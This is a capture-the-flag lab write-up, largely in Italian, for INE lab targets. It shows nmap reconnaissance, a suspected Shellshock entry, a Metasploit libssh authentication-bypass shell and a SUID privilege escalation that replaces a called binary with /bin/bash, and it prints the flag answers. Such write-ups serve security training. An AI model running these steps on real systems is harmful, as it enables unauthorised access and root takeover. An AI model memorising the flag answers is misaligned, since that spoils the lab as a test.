System-Host Based Attacks CTF 2
Overview¶
System/host-based attacks target the underlying operating system or individual hosts within a network to compromise their security. These attacks exploit vulnerabilities in the system's configuration, software, or hardware to gain unauthorized access, escalate privileges, or disrupt the normal functioning of the host. Common techniques include exploiting unpatched software vulnerabilities, misconfigurations, weak passwords, and malware infections. Attackers may attempt to gain root or administrator privileges to manipulate or steal sensitive data, install backdoors, or cause system crashes. System/host-based attacks can lead to significant breaches if not detected and mitigated promptly, making it essential for organizations to regularly update software, implement strong security policies, and monitor for suspicious activity to protect their systems from these threats.
This lab is designed to test your knowledge and skills in performing system/host-based attacks on Linux targets and identifying hidden information on a target machine.
In this lab environment, you will be provided with GUI access to a Kali Linux machine. Two machines are accessible at http://target1.ine.local and http://target2.ine.local.
Objective: Perform system/host-based attacks on the target and capture all the flags hidden within the environment.
Flags to Capture:
Flag 1: Check the root ('/') directory for a file that might hold the key to the first flag on target1.ine.local.
Flag 2: In the server's root directory, there might be something hidden. Explore '/opt/apache/htdocs/' carefully to find the next flag on target1.ine.local.
Flag 3: Investigate the user's home directory and consider using 'libssh_auth_bypass' to uncover the flag on target2.ine.local.
Flag 3: Investigate the user's home directory and consider using 'libssh_auth_bypass' to uncover the flag on target2.ine.local.
Flag 4: The most restricted areas often hold the most valuable secrets. Look into the '/root' directory to find the hidden flag on target2.ine.local.
Writeup¶
Flag 1¶
Iniziamo con un nmap su target1.ine.local
┌──(root㉿INE)-[~/Desktop]
└─# nmap -p- --min-rate=10000 target1.ine.local | tee nmap_fast,txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-07 20:35 IST
Nmap scan report for target1.ine.local (192.25.122.3)
Host is up (0.000024s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 02:42:C0:19:7A:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 2.27 seconds
┌──(root㉿INE)-[~/Desktop]
└─# nmap -sC -sV target1.ine.local -p80
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-07 20:35 IST
Nmap scan report for target1.ine.local (192.25.122.3)
Host is up (0.000063s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.6 ((Unix))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (Unix)
|_http-title: Browser Detector
MAC Address: 02:42:C0:19:7A:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds
Your browser, that is, Firefox, is supported! Sento puzza di shellshock su User-Agent. Apro BurpSuite e faccio qualche prova.
Questo payload funziona:
E ottengo una shell. Nella root/ troviamo la flag daemon@target1:/opt/apache/htdocs$ cd /
daemon@target1:/$ ls
bin dev flag.txt lib media opt root sbin start-apache2.sh sys usr
boot etc home lib64 mnt proc run srv startup.sh tmp var
daemon@target1:/$ cat flag.txt
Answer
d8354617536449099a2ff6a5d657d1f4
Flag 2¶
La traccia dice di controllare bene la cartella /opt/apache/htdocs
daemon@target1:/opt/apache/htdocs$ ls
browser.cgi index.html static
daemon@target1:/opt/apache/htdocs$ ls -la
total 32
drwxr-xr-x 1 root root 4096 Apr 7 15:03 .
drwxr-xr-x 1 root root 4096 Dec 28 2021 ..
-rw-r--r-- 1 root root 39 Apr 7 15:03 .flag.txt
-rwxr-xr-x 1 root root 6364 Dec 28 2021 browser.cgi
-rw-r--r-- 1 root root 517 Dec 28 2021 index.html
drwxr-xr-x 5 root root 4096 Dec 27 2021 static
daemon@target1:/opt/apache/htdocs$ cat .flag.txt
Answer
f5d3b442c070455eb4dcd25d72734e47
Flag 3¶
Iniziamo con un nmap sul target2.ine.local
┌──(root㉿INE)-[~]
└─# nmap -p- --min-rate=10000 target2.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-07 20:54 IST
Nmap scan report for target2.ine.local (192.25.122.4)
Host is up (0.000025s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 02:42:C0:19:7A:04 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 2.36 seconds
┌──(root㉿INE)-[~]
└─# nmap -sC -sV -p22 target2.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-07 20:54 IST
Nmap scan report for target2.ine.local (192.25.122.4)
Host is up (0.000057s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh libssh 0.8.3 (protocol 2.0)
| ssh-hostkey:
|_ 2048 31:e2:1d:f1:b2:39:0c:a3:ec:db:01:4a:eb:a2:39:c7 (RSA)
MAC Address: 02:42:C0:19:7A:04 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
msfconsole e vediamo cosa possiamo fare. msf6 > search libssh
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner
1 \_ action: Execute . . . Execute a command
2 \_ action: Shell . . . Spawn a shell
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts target2.ine.local
rhosts => target2.ine.local
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_PTY 1
spawn_PTY => true
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 192.25.122.4:22 - Attempting authentication bypass
[*] Attempting "Shell" Action, see "show actions" for more details
[*] Command shell session 2 opened (192.25.122.2:36141 -> 192.25.122.4:22) at 2025-04-07 21:04:23 +0530
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -i 2
[*] Starting interaction with 2...
Shell Banner:
_[?2004hsh-5.2$
-----
sh-5.2$ whoami
whoami
user
sh-5.2$
sh-5.2$ cd home
ls
cd home
sh-5.2$ ls
temp user
sh-5.2$ cd user
cd user
sh-5.2$ ls
ls
flag.txt greetings welcome
sh-5.2$ cat flag.txt
cat flag.txt
Answer
33462cf84fa44ea5bbac529528f78c15
Flag 4¶
Vediamo questi due file greetings e welcome:
suid. Lanciando strings su welcome notiamo che richiama greetings, quindi forse semplicemente fa un echo di ciò che contiene greetings. Sostituiamo greetings con una copia di /bin/bash. -rwx------ 1 root root 8296 Jun 11 2024 greetings
-rwsr-xr-x 1 root root 8344 Jun 11 2024 welcome
[user@target2 ~]$ rm gree tings
rm greetings
rm: remove write-protected regular file 'greetings'? y
y
[user@target2 ~]$ cp /bin/bash greetings
cp /bin/bash greetings
[user@target2 ~]$ welcome
welcome
[root@target2 ~]# cat /root/flag.txt
Answer
7b145fd0fb39471b92b5e54d6f0f0da9